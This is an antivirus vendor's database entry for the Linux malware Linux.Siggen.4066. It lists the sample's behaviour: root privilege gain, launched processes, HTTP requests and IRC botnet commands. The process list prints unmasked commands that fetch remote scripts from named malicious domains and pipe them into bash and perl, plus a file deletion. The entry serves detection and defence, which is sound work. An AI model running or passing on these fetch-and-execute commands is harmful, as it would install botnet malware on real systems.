JavaScript support is required for our site to be fully operational in your browser.
Linux.Siggen.4066
Added to the Dr.Web virus database:
2021-07-27
Virus description added:
2021-07-27
Technical Information
Malicious functions:
Gains root privileges
Substitutes application name for:
Launches processes:
wget -O - usa1.space/bot/bash
bash
ps x
grep stats
grep -v grep
wget -O - sistem.work/irc
perl
uname -a
rm -rf ck.log
Attempts to kill the following processes:
Performs operations with the file system:
Creates or modifies files:
Deletes files:
Network activity:
Establishes connection:
HTTP GET requests:
us##.#pace/bot/bash
si###m.work/irc
Connects to the following servers over the IRC protocol:
Server: 13#.#9.45.149; Command: NICK b\n
Server: 13#.#9.45.149; Command: USER b 19#.#68.208.50 usa1.space :Linux box-amd64 3.16.7-ckt20 #2 SMP Sun Mar 20 12:22:57 MSK 2016 x86_64 GNU/Linux\n\n
Server: 13#.#9.45.149; Command: NICK b10417-\n
Server: 13#.#9.45.149; Command: PONG :766CDBCE\n
Server: 13#.#9.45.149; Command: JOIN #china muietie\n
DNS ASK:
Other:
Collects CPU information
Collects RAM information
Curing recommendations
Linux
Free trial
One month (no registration) or three months (registration and renewal discount)
このウェブサイトを継続して訪問する場合、訪問者に関する統計データを収集するためのCookieファイルおよび他のテクノロジーを弊社が利用することに同意したものとします。詳細
OK